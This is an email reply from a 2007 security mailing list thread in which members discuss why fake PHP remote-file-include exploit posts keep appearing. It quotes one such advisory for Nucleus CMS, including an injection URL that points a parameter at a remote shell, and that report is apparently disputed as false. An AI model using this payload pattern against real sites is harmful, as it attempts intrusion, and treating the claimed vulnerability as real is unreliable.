I like the idea they are all terrorist passing secret messages in fake exploits. <br>/me waits on the Tom Clancy movie<br><br><div><span class="gmail_quote">On 5/7/07, <b class="gmail_sendername">Ron Superior</b> <<a href="mailto:rsuperior@gmail.com">
rsuperior@gmail.com</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Hi folks,<br><br> Some months back I seem to remember people hypothesizing as to the
<br>real purpose behind some of these particularly lame fake PHP exploits.<br> You know the ones I mean; they're mostly remote file includes, they<br>often are decorated with some simple ASCII art, and the "thanks" and
<br>"greetz" sections are always loaded with names that suggest Turkish or<br>other Middle Eastern origin.<br><br> The two most interesting suggestions that I recall were:<br><br> 1) Somebody wanted to pump up the lists with PHP exploits so they
<br>could claim later that some large number X of PHP vulnerabilities had<br>been posted to FD since some date.<br><br> 2) Covert communication, or that the "exploits" were really secret<br>messages between t3rr0ri$ts or something.
<br><br> I'm sure there exists a motive beyond just spamming us to be<br>annoying. Any one have any new ideas, or good arguments for either of<br>the above two ideas?<br><br> Ron<br><br>Guasconi Vincent wrote:<br>
> On 5/6/07, security curmudgeon <<a href="mailto:jericho@attrition.org">jericho@attrition.org</a>> wrote:<br>>> : VENDOR :<a href="http://nucleuscms.org/">http://nucleuscms.org/</a><br>>> : BY : s3rv3r_hack3r (
<a href="http://hackerz.ir">hackerz.ir</a> admin)<br>>> : bug:<br>>> : nucleus3.22/nucleus/plugins/skinfiles/index.php =<br>include($DIR_LIBS . 'PLUGINADMIN.php');<br>>> : Exloit:<br>>> :
<a href="http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell">http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell</a><br>>><br>>> I haven't examined the source code to this, but on June 16, 2006,
<br>>> <a href="mailto:gamr-14@hotmail.com">gamr-14@hotmail.com</a> disclosed RFI vulnerabilities [1] in four Nucleus<br>>> scripts, all with the DIR_LIBS variable as the injection point. This was<br>>> subsequently proven to be a false report as the variable was previously
<br>>> set and could not be manipulated by an attacker.<br>>><br>>> Have you actually tested this, or is this based on a quick grep of the<br>>> source code?<br>><br>> They're like bots now.
<br>> They didn't hear you, and you can't stop them.<br>><br>> Try a spam rule.<br>><br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br></blockquote></div><br><br clear="all"><br>-- <br>-- h0 h0 h0 --<br><a href="http://www.nopsled.net">
www.nopsled.net</a>